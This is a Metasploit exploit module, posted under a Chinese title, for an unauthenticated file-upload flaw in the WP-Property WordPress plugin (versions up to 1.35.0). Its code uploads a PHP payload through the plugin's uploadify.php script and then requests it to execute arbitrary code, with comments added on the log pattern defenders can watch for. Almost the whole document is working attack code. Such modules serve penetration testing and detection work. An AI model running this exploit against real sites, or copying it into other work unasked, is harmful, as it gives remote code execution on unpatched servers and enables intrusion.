WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0, per the module description).
#
# Reviewer notes for defenders:
# * Every request this module sends to the plugin goes to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   below TARGETURI. An unauthenticated multipart POST to that script that
#   carries a "Filedata" part with a ".php" filename, followed by a GET for
#   the path the script returned, is the observable pattern in web logs.
# * The uploaded file name is five random alphabetic characters plus ".php",
#   so a fixed file name is not a usable indicator; the request path is.
# * NOTE(review): the fixed plugin version is not stated on this page; the
#   description only bounds the affected range at 1.35.0 -- confirm the
#   patched release against the references listed below.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, payload constraints,
  # targets) and the single TARGETURI option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'
    )
    super(module_info)

    module_options = [
      OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
    ]
    register_options(module_options, self.class)
  end

  # Probes for the presence of the plugin's uploadify.php script.
  #
  # The result is based only on the HTTP status of a GET request: no
  # response or a non-200 status yields Unknown, anything else Appears.
  # The plugin version is never inspected, so "Appears" means "the script
  # is reachable", not "the installed version is confirmed vulnerable".
  #
  # @return [Exploit::CheckCode::Unknown, Exploit::CheckCode::Appears]
  def check
    base = target_uri.path
    # Appends in place, exactly as the original does, so the path ends in '/'.
    base << '/' unless base[-1, 1] == '/'

    probe = {
      'method' => 'GET',
      'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    }
    reply = send_request_cgi(probe)

    return Exploit::CheckCode::Unknown unless reply && reply.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads the payload through uploadify.php and then requests it.
  #
  # Sequence visible in this method:
  # 1. Build a multipart body with a "Filedata" part (the payload, under a
  #    random five-letter ".php" name) and a "folder" part naming the
  #    uploadify directory.
  # 2. POST that body to uploadify.php without any credentials.
  # 3. Treat a missing response, a non-200 status, or a body that does not
  #    contain the payload file name as a failed upload.
  # 4. Use the response body verbatim as the URI of a follow-up GET.
  def exploit
    base = target_uri.path
    # Appends in place, exactly as the original does, so the path ends in '/'.
    base << '/' unless base[-1, 1] == '/'
    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    # NOTE(review): :unlink_self presumably asks the PhpEXE stager to delete
    # itself after running -- confirm in Msf::Exploit::PhpEXE.
    stager = get_write_exec_payload(:unlink_self => true)

    form = Rex::MIME::Message.new
    form.add_part(stager, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    form.add_part("#{base}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drop the CRLF that precedes a boundary at the start of a line.
    post_data = form.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    upload_request = {
      'method' => 'POST',
      'uri'    => "#{base}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{form.bound}",
      'data'   => post_data
    }
    reply = send_request_cgi(upload_request)

    unless reply && reply.code == 200 && reply.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The script's response body is taken as the location of the stored file.
    stored_at = reply.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    trigger_request = {
      'uri'    => stored_at,
      'method' => 'GET'
    }
    send_request_raw(trigger_request)
  end
end
不要问我这写的是什么 怎么利用 我是说msf.